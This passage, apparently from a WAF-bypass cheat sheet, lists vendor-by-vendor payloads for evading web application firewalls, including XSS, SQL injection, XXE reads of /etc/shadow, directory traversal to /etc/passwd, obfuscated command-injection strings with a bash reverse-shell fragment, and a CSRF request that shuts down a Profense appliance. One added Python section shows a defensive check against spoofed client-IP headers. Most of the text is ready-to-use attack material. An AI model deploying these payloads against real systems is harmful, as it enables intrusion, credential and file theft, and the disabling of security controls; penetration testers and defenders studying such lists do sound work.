Find out which ciphers the WAF supports (WAF vendor documentation usually covers this).
Find out which ciphers the server supports (a tool such as SSLScan can help).
Find the ones the server supports but the WAF does not.
Tool: abuse-ssl-bypass-waf
Abusing DNS records:
Find the origin server behind a cloud WAF.
TIP: some online resources: IP History and DNS Trails
Tool: bypass-firewalls-by-DNS-history
bash bypass-firewalls-by-DNS-history.sh -d <target> --checkall
Request header spoofing
Make the WAF believe the request comes from the internal network so that it is not filtered.
Add the following request headers:
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
Google dorks approach:
Bypasses for known WAFs
Search syntax:
Normal search:
+<wafname> waf bypass
Searching for specific version exploits: "<wafname> <version>" (bypass|exploit)
For specific type bypass exploits: "<wafname>" +<bypass type> (bypass|exploit)
On Exploit DB: site:exploit-db.com +<wafname> bypass
On 0Day Inject0r DB: site:0day.today +<wafname> <type> (bypass|exploit)
On Twitter: site:twitter.com +<wafname> bypass
On Pastebin: site:pastebin.com +<wafname> bypass
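From the receiving side, these headers are only a problem when a WAF or application trusts them regardless of who sent them. The added example below, which is not from the original article, shows the usual defence: derive the client address from the TCP peer, honour X-Forwarded-For only when the peer is one of our own proxies, and even then walk the chain from the right so that hops an outside client prepended are ignored; the other four headers are never consulted. The proxy and internal network ranges and the function names are this example's assumptions.

```python
import ipaddress

# Assumptions for this example: our own reverse proxies live in 10.0.0.0/8 and
# "internal" means RFC 1918 or loopback. Adjust both to the real deployment.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]
INTERNAL_NETWORKS = [ipaddress.ip_network(n) for n in
                     ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
# The five headers the section lists; none of them is authenticated.
SPOOFABLE_HEADERS = ("x-originating-ip", "x-forwarded-for", "x-remote-ip",
                     "x-remote-addr", "x-client-ip")


def _in_any(addr, networks):
    return any(addr in net for net in networks)


def effective_client_ip(peer_ip, headers):
    """Client address as it should be used for trust decisions.
    The TCP peer is the only fact we have; X-Forwarded-For is used only if the peer is a
    trusted proxy, and then the rightmost hop that is not itself a trusted proxy wins."""
    peer = ipaddress.ip_address(peer_ip)
    if not _in_any(peer, TRUSTED_PROXIES):
        return peer                      # direct connection: whatever it put in headers is noise
    lowered = {k.lower(): v for k, v in headers.items()}
    hops = [h.strip() for h in lowered.get("x-forwarded-for", "").split(",") if h.strip()]
    for hop in reversed(hops):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            continue                     # malformed hop: skip it rather than trust it
        if not _in_any(addr, TRUSTED_PROXIES):
            return addr
    return peer


def is_internal_client(peer_ip, headers):
    return _in_any(effective_client_ip(peer_ip, headers), INTERNAL_NETWORKS)


def spoof_attempt_headers(headers):
    """Client-IP headers present in the request; on a direct (non-proxy) connection these
    are a detection signal worth logging, since nothing legitimate sets them there."""
    present = {k.lower() for k in headers}
    return [h for h in SPOOFABLE_HEADERS if h in present]


if __name__ == "__main__":
    spoofed = {"X-Forwarded-For": "127.0.0.1", "X-Client-IP": "127.0.0.1"}
    print("direct peer 203.0.113.5 ->", effective_client_ip("203.0.113.5", spoofed),
          "internal:", is_internal_client("203.0.113.5", spoofed),
          "headers seen:", spoof_attempt_headers(spoofed))
    print("via proxy 10.0.0.2 ->",
          effective_client_ip("10.0.0.2", {"X-Forwarded-For": "127.0.0.1, 203.0.113.5"}))
```

The same rule belongs in the WAF's own configuration: a rule that exempts "internal" traffic must key on the address the engine derived this way, not on any header value.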
0X06 More bypass techniques
Airlock Ergon
SQLi Overlong UTF-8 Sequence Bypass (>= v4.2.4) by @Sec Consult
%C0%80'+union+select+col1,col2,col3+from+table+--+
AWS
SQLi Bypass by @enkaskal
";select * from TARGET_TABLE --
XSS Bypass by @kmkz
<script>eval(atob(decodeURIComponent("payload")))//
Barracuda
Cross Site Scripting by @WAFNinja
<body style="height:1000px" onwheel="alert(1)">
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">
<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>
HTML Injection by @Global-Evolution
GET /cgi-mod/index.cgi?&primary_tab=ADVANCED&secondary_tab=test_backup_server&content_only=1&&&backup_port=21&&backup_username=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_type=ftp&&backup_life=5&&backup_server=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_path=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_password=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net%20width%3D800%20height%3D800%3E&&user=guest&&password=121c34d4e85dfe6758f31ce2d7b763e7&&et=1261217792&&locale=en_US
Host: favoritewaf.com
User-Agent: Mozilla/5.0 (compatible; MSIE 5.01; Windows NT)
XSS Bypass by @0xInfection
<a href=j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At:open()>clickhere
Barracuda WAF 8.0.1 - Remote Command Execution (Metasploit) by @xort
Barracuda Spam & Virus Firewall 5.1.3 - Remote Command Execution (Metasploit) by @xort
Cerber (WordPress)
Username Enumeration Protection Bypass by HTTP Verb Tampering by @ed0x21son
POST host.com HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/5.0 (compatible; MSIE 5.01; Windows NT)
author=1
Protected Admin Scripts Bypass by @ed0x21son
http://host/wp-admin///load-scripts.php?load%5B%5D=jquery-core,jquery-migrate,utils
http://host/wp-admin///load-styles.php?load%5B%5D=dashicons,admin-bar
REST API Disable Bypass by @ed0x21son
http://host/index.php/wp-json/wp/v2/users/
Citrix NetScaler
SQLi via HTTP Parameter Pollution (NS10.5) by @BGA Security
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
<soapenv:Header/>
<soapenv:Body>
<string>' union select current_user,2#</string>
</soapenv:Body>
</soapenv:Envelope>
generic_api_call.pl
XSS by @NNPoster
http://host/ws/generic_api_call.pl?function=statns&standalone=%3c/script%3e%3cscript%3ealert(document.cookie)%3c/script%3e%3cscript%3e
Cloudflare
HTML Injection by @spyerror
<div style="background:url(/f#oo/;color:red/*/foo.jpg);">X
XSS Bypass by @c0d3g33k
<a+HREF='javascrip%26%239t:alert%26lpar;document.domain)'>test</a>
XSS Bypasses by @Bohdan Korzhynskyi
<svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23x000000028;document.domain)>
xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
1'"><img/src/onerror=.1|alert``>
XSS Bypass by @RakeshMane10
<svg/onload=alert()//
XSS Bypass by @ArbazKiraak
<a href="j	a	v	asc
ri	pt:\u0061\u006C\u0065\u0072\u0074(this['document']['cookie'])">X</a>
XSS Bypass by @Ahmet Ümit
<--`<img/src=`onerror=confirm``> --!>
XSS Bypass by @Shiva Krishna
javascript:{alert`0`}
XSS Bypass by @Brute Logic
<base href=//knoxss.me?
XSS Bypass by @RenwaX23 (Chrome only)
<j id=x style="-webkit-user-modify:read-write" onfocus={window.onerror=eval}throw/0/+name>H</j>#x
RCE Payload Detection Bypass by @theMiddle
cat$u+/etc$u/passwd$u
/bin$u/bash$u <ip> <port>
";cat+/etc/passwd+#
Comodo
XSS Bypass by @0xInfection
<input/oninput='new Function`confir\u006d\`0\``'>
<p/ondragstart=%27confirm(0)%27.replace(/.+/,eval)%20draggable=True>dragme
SQLi by @WAFNinja
0 union/**/select 1,version(),@@datadir
DotDefender
Firewall disable (v5.0) by @hyp3rlinx
PGVuYWJsZWQ+ZmFsc2U8L2VuYWJsZWQ+
<enabled>false</enabled>
Remote Command Execution (v3.8-5) by @John Dos
POST /dotDefender/index.cgi HTTP/1.1
Host: 172.16.159.132
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Authorization: Basic YWRtaW46
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
sitename=dotdefeater&deletesitename=dotdefeater;id;ls -al ../;pwd;&action=deletesite&linenum=15
Persistent XSS (v4.0) by @EnableSecurity
GET /c?a=<script> HTTP/1.1
Host: 172.16.159.132
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US;
rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
<script>alert(1)</script>: aa
Keep-Alive: 300
R-XSS Bypass by @WAFNinja
<svg/onload=prompt(1);>
<isindex action="javas&tab;cript:alert(1)" type=image>
<marquee/onstart=confirm(2)>
XSS Bypass by @0xInfection
<p draggable=True ondragstart=prompt()>alert
<bleh/ondragstart=	parent	['open']	()%20draggable=True>dragme
GET - XSS Bypass (v4.02) by @DavidK
/search?q=%3Cimg%20src=%22WTF%22%20onError=alert(/0wn3d/.source)%20/%3E
<img src="WTF" onError="{var
{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v%2Ba%2Be%2Bs](e%2Bs%2Bv%2B
h%2Bn)(/0wn3d/.source)"/>
POST - XSS Bypass (v4.02) by @DavidK
<img src="WTF" onError="{var
{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/0wn3d/
.source)" />
clave
XSS (v4.02) by @DavidK
/?&idPais=3&clave=%3Cimg%20src=%22WTF%22%20onError=%22{
Fortinet Fortiweb
pcre_expression
Unvalidated XSS by @Benjamin Mejri
/waf/pcre_expression/validate?redir=/success&mkey=0%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C
/waf/pcre_expression/validate?redir=/success%20%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C&mkey=0
CSP Bypass by @Binar10
POST Type Query
POST /<path>/login-app.aspx HTTP/1.1
Host: <host>
User-Agent: <any valid user agent string>
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: <the content length must be at least 2399 bytes>
var1=datavar1&var2=datavar12&pad=<random data to complete at least 2399 bytes>
GET Type Query
http://<domain>/path?var1=vardata1&var2=vardata2&pad=<large arbitrary data>
F5 ASM
XSS Bypass by @WAFNinja
<table background="javascript:alert(1)"></table>
"/><marquee onfinish=confirm(123)>a</marquee>
F5 BIG-IP
XSS Bypass by @WAFNinja
<body style="height:1000px" onwheel="[DATA]">
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="[DATA]">
<body style="height:1000px" onwheel="prom%25%32%33%25%32%36x70;t(1)">
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="prom%25%32%33%25%32%36x70;t(1)">
XSS Bypass by @Aatif Khan
<body style="height:1000px" onwheel="prom%25%32%33%25%32%36x70;t(1)">
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="prom%25%32%33%25%32%36x70;t(1)">
report_type
XSS by @NNPoster
https://host/dms/policy/rep_request.php?report_type=%22%3E%3Cbody+onload=alert(%26quot%3BXSS%26quot%3B)%3E%3Cfoo+
POST Based XXE by @Anonymous
POST /sam/admin/vpe2/public/php/server.php HTTP/1.1
Host: bigip
Cookie: BIGIPAuthCookie=*VALID_COOKIE*
Content-Length: 143
<?xml version="1.0" encoding='utf-8'?>
<!DOCTYPE a [<!ENTITY e SYSTEM '/etc/shadow'> ]>
<message><dialogueType>&e;</dialogueType></message>
Directory Traversal by @Anastasios Monachos
Read Arbitrary File
/tmui/Control/jspmap/tmui/system/archive/properties.jsp?&name=../../../../../etc/passwd
Delete Arbitrary File
POST /tmui/Control/form HTTP/1.1
Host: site.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=6C6BADBEFB32C36CDE7A59C416659494; f5advanceddisplay=""; BIGIPAuthCookie=89C1E3BDA86BDF9E0D64AB60417979CA1D9BE1D4; BIGIPAuthUsernameCookie=admin; F5_CURRENT_PARTITION=Common; f5formpage="/tmui/system/archive/properties.jsp?&name=../../../../../etc/passwd"; f5currenttab="main"; f5mainmenuopenlist=""; f5_refreshpage=/tmui/Control/jspmap/tmui/system/archive/properties.jsp%3Fname%3D../../../../../etc/passwd
Content-Type: application/x-www-form-urlencoded
_form_holder_opener_=&handler=%2Ftmui%2Fsystem%2Farchive%2Fproperties&handler_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties&showObjList=&showObjList_before=&hideObjList=&hideObjList_before=&enableObjList=&enableObjList_before=&disableObjList=&disableObjList_before=&_bufvalue=icHjvahr354NZKtgQXl5yh2b&_bufvalue_before=icHjvahr354NZKtgQXl5yh2b&_bufvalue_validation=NO_VALIDATION&com.f5.util.LinkedAdd.action_override=%2Ftmui%2Fsystem%2Farchive%2Fproperties&com.f5.util.LinkedAdd.action_override_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties&linked_add_id=&linked_add_id_before=&name=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&name_before=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&form_page=%2Ftmui%2Fsystem%2Farchive%2Fproperties.jsp%3F&form_page_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties.jsp%3F&download_before=Download%3A+..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&restore_before=Restore&delete=Delete&delete_before=Delete
F5 FirePass
SQLi Bypass from @Anonymous
state=%2527+and+
(case+when+SUBSTRING(LOAD_FILE(%2527/etc/passwd%2527),1,1)=char(114)+then+
BENCHMARK(40000000,ENCODE(%2527hello%2527,%2527batman%2527))+else+0+end)=0+--+
ModSecurity
RCE Payloads Detection Bypass for PL3 by @theMiddle (v3.1)
;+$u+cat+/etc$u/passwd$u
RCE Payloads Detection Bypass for PL2 by @theMiddle (v3.1)
;+$u+cat+/etc$u/passwd+\#
RCE Payloads for PL1 and PL2 by @theMiddle (v3.0)
/???/??t+/???/??ss??
RCE Payloads for PL3 by @theMiddle (v3.0)
/?in/cat+/et?/passw?
SQLi Bypass by @Johannes Dahse (v2.2)
0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user
SQLi Bypass by @Yuri Goltsev (v2.2)
1 AND (select DCount(last(username)&after=1&after=1) from users where username='ad1min')
SQLi Bypass by @Ahmad Maulana (v2.2)
1'UNION/*!0SELECT user,2,3,4,5,6,7,8,9/*!0from/*!0mysql.user/*-
SQLi Bypass by @Travis Lee (v2.2)
amUserId=1 union select username,password,3,4 from users
SQLi Bypass by @Roberto Salgado (v2.2)
%0Aselect%200x00,%200x41%20like/*!31337table_name*/,3%20from%20information_schema.tables%20limit%201
SQLi Bypass by @Georgi Geshev (v2.2)
1%0bAND(SELECT%0b1%20FROM%20mysql.x)
SQLi Bypass by @SQLMap Devs (v2.2)
%40%40new%20union%23sqlmapsqlmap...%0Aselect%201,2,database%23sqlmap%0A%28%29
SQLi Bypass by @HackPlayers (v2.2)
%0Aselect%200x00%2C%200x41%20not%20like%2F*%2100000table_name*%2F%2C3%20from%20information_schema.tables%20limit%201
Imperva
Imperva SecureSphere 13 - Remote Command Execution by @rsp3ar
XSS Bypass by @David Y
<svg onload\r\n=$.globalEval("al"+"ert()");>
XSS Bypass by @Emad Shanab
<svg/onload=self[`aler`%2b`t`]`1`>
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
XSS Bypass by @WAFNinja
%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E
XSS Bypass by @i_bo0om
<iframe/onload='this["src"]="javas	cript:al"+"ert``"';>
<img/src=q onerror='new Function`al\ert\`1\``'>
XSS Bypass by @c0d3g33k
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
SQLi Bypass by @DRK1WI
15 and '1'=(SELECT '1' FROM dual) and '0having'='0having'
SQLi by @Giuseppe D'Amore
stringindatasetchoosen%%' and 1 = any (select 1 from SECURE.CONF_SECURE_MEMBERS where FULL_NAME like '%%dministrator' and rownum<=1 and PASSWORD like '0%') and '1%%'='1
Imperva SecureSphere <= v13 - Privilege Escalation by @0x09AL
Kona SiteDefender
HTML Injection by @sp1d3rs
%2522%253E%253Csvg%2520height%3D%2522100%2522%2520width%3D%2522100%2522%253E%2520%253Ccircle%2520cx%3D%252250%2522%2520cy%3D%252250%2522%2520r%3D%252240%2522%2520stroke%3D%2522black%2522%2520stroke-width%3D%25223%2522%2520fill%3D%2522red%2522%2520%2F%253E%2520%253C%2Fsvg%253E
XSS Bypass by @Jonathan Bouman
<body%20alt=al%20lang=ert%20onmouseenter="top['al'+lang](/PoC%20XSS%20Bypass%20by%20Jonathan%20Bouman/)"
XSS Bypass by @zseano
?"></script><base%20c%3D=href%3Dhttps:\mysite>
XSS Bypass by @0xInfection
<abc/onmouseenter=confirm%60%60>
XSS Bypass by @sp1d3rs
%2522%253E%253C%2Fdiv%253E%253C%2Fdiv%253E%253Cbrute%2520onbeforescriptexecute%3D%2527confirm%28document.domain%29%2527%253E
XSS Bypass by @Frans Rosén
<style>@keyframesa{}b{animation:a;}</style><b/onanimationstart=prompt`${document.domain}`>
XSS Bypass by @Ishaq Mohammed
<marquee+loop=1+width=0+onfinish='new+Function`al\ert\`1\``'>
Profense
GET Type CSRF Attack by @Michael Brooks (>= v.2.6.2)
Turn off Profense Machine
<img src=https://host:2000/ajax.html?action=shutdown>
Add a proxy
<img src=https://10.1.1.199:2000/ajax.html?vhost_proto=http&vhost=vhost.com&vhost_port=80&rhost_proto=http&rhost=10.1.1.1&rhost_port=80&mode_pass=on&xmle=on&enable_file_upload=on&static_passthrough=on&action=add&do=save>
XSS Bypass by @Michael Brooks (>= v.2.6.2)
https://host:2000/proxy.html?action=manage&main=log&show=deny_log&proxy=>"<script>alert(document.cookie)</script>
XSS Bypass by @EnableSecurity (>= v2.4)
%3CEvil%20script%20goes%20here%3E=%0AByPass
%3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E
QuickDefense
XSS Bypass by @WAFNinja
?<input type="search" onsearch="aler\u0074(1)">
<details ontoggle=alert(1)>
Sucuri
Smuggling RCE Payloads by @theMiddle
/???/??t+/???/??ss??
Obfuscating RCE Payloads by @theMiddle
;+cat+/e'tc/pass'wd
c\\a\\t+/et\\c/pas\\swd
XSS Bypass by @Luka
"><input/onauxclick="[1].map(prompt)">
XSS Bypass by @Brute Logic
data:text/html,<form action=https://brutelogic.com.br/xss-cp.php method=post>
<input type=hidden name=a value="<img/src=//knoxss.me/yt.jpg onpointerenter=alert`1`>">
<input type=submit></form>
URLScan
Directory Traversal by @ZeQ3uL (<= v3.1) (Only on ASP.NET)
http://host.com/test.asp?file=.%./bla.txt
WebARX
Cross Site Scripting by @0xInfection
<a69/onauxclick=open()>rightclickhere
WebKnight
Cross Site Scripting by @WAFNinja
<isindex action=j	a	vas	c	r	ipt:alert(1) type=image>
<marquee/onstart=confirm(2)>
<details ontoggle=alert(1)>
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">
<img src=x onwheel=prompt(1)>
SQLi by @WAFNinja
0 union(select 1,username,password from(users))
0 union(select 1,@@hostname,@@datadir)
XSS Bypass by @Aatif Khan (v4.1)
<details ontoggle=alert(1)>
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">
SQLi Bypass by @ZeQ3uL
10 a%nd 1=0/(se%lect top 1 ta%ble_name fr%om info%rmation_schema.tables)
Wordfence
XSS Bypass by @Brute Logic
<a href=javascript:alert(1)>
XSS Bypass by @0xInfection
<a/**/href=j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At:/**/alert()/**/>click
HTML Injection by @Voxel
http://host/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
XSS Exploit by @MustLive (>= v3.3.5)
<html>
<head>
<title>Wordfence Security XSS exploit (C) 2012 MustLive.
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/?_wfsf=unlockEmail" method="post">
<input type="hidden" name="email"
value="<script>alert(document.cookie)</script>">
</form>
</body>
</html>
Other XSS Bypasses
<meter onmouseover="alert(1)"
'">><div><meter onmouseover="alert(1)"</div>"
>><marquee loop=1 width=0 onfinish=alert(1)>
Apache Generic
Writing method type in lowercase by @i_bo0om
get /login HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT)
IIS Generic
Tabs before method by @i_bo0om
	GET /login.php HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT)